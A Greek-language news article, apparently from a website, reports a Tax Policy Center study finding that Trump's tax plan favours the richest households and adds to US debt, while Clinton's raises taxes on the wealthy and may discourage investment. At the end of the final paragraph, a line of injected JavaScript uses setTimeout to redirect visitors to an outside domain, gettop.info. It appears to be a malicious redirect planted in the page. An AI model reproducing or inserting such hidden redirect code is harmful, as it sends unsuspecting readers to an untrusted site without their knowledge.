Για τους πολύ πλούσιους τα φορολογικά μέτρα του Τραμπ – Η Χίλαρι σταματά τις επενδύσεις

0
7

 

Μελέτη αναφέρεται στην οικονομική πολιτική που έχουν εξαγγείλει οι δύο υποψήφιοι για την προεδρία των ΗΠΑ την οποία θα εφαρμόσουν αν εκλεγούν.

Όπως σχολιάζεται, η γενικευμένη μείωση της φορολογίας που υποσχέθηκε ο Ρεπουμπλικανός Ντόναλντ Τραμπ μπορεί να ωφελήσει κυρίως τα πλέον ευκατάστατα νοικοκυριά, ενώ οι προτάσεις της Δμοκρατικής Χίλαρι Κλίντον κινδυνεύουν να σταματήσουν τις επενδύσεις.

Το φορολογικό πρόγραμμα του Τραμπ είναι πιθανόν να οδηγήσει σε «μείωση των φόρων σε όλα τα επίπεδα εισοδημάτων παρότι τα νοικοκυριά με το υψηλότερο εισόδημα θα είναι αυτά που θα επωφεληθούν περισσότερο«, επισημαίνει το Tax Policy Center (TPC).

Το 1% των φορολογουμένων που κερδίζουν πάνω από 3,7 εκατομμύρια δολάρια ετησίως, με την εφαρμογή του φορολογικού αυτού προγράμματος μπορεί να έχουν μείωση της φορολογίας τους κατά μέσο κατά 1,1 εκατομμύριο δολάρια, ενισχύοντας το καθαρό εισόδημά τους κατά 14%, σύμφωνα με τη μελέτη. Ως εκ τούτου, ο μέγιστος φορολογικός συντελεστής θα μειωνόταν από 39,6 στο 33%.

Όπως τονίζει το TPC, το 20% των πλέον φτωχών νοικοκυριών θα έβλεπαν τους φόρους τους να μειώνονται κατά 110 δολάρια και κατά συνέπεια θα είχαν μια μικρή αύξηση του καθαρού εισοδήματός τους (+0,8%).

Και προσθέτει πως η πρόταση του Ρεπουμπλικανού υποψηφίου για μείωση σε ομοσπονδιακό επίπεδο του φορολογικού συντελεστή για τις επιχειρήσεις από 35 σε 15%, μπορεί να «αυξήσει το ύψος των αποταμιεύσεων και των επενδύσεων» στις ΗΠΑ, αλλά θα συντελέσει στην αύξηση του χρέους της χώρας κατά 7,2 τρισεκ. δολάρια μέχρι το 2026, δηλαδή μια αύξηση 36,5%.

Το επιτελείο του Τραμπ με ανακοίνωσή του κατήγγειλε μια «παραπλανητική μελέτη» που βασίζεται σε εσφαλμένα στοιχεία και δήλωσε ότι οι προτάσεις του Τραμπ «δεν θίγουν» τα αμερικανικά δημοσιονομικά έσοδα, ενώ ευνοούν τα μεσαία κλιμάκια.

«Η Χίλαρι Κλίντον είναι αυτή που προετοιμάζει μυστικά χάρες για τη Γουόλ Στριτ, όχι εμείς«, τόνισε σύμβουλος του Τραμπ.

Σύμφωνα με το TPC, οι προτάσεις της υποψήφιας των Δημοκρατικών θα επιτρέψουν τη μείωση του χρέους κατά 1,6 τρισ. δολάρια την επόμενη 10ετία με την αύξηση των φόρων για τους πλουσιότερους πολίτες, των οποίων τα καθαρά έσοδα θα μειωθούν κατά μέσο κατά 7,4%.

Τα εισοδηματικά κέρδη για τις άλλες κατηγορίες του πληθυσμού θα είναι ωστόσο μικρά, μεταξύ 0,1% και 0,6%.

Σύμφωνα με το TPC, το φορολογικό πρόγραμμα της Κλίντον κινδυνεύει να αποθαρρύνει τους πολύ πλούσιους να «αποταμιεύσουν και να επενδύσουν», όπως και να κάνει τον φορολογικό κώδικα «περισσότερο περίπλοκο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here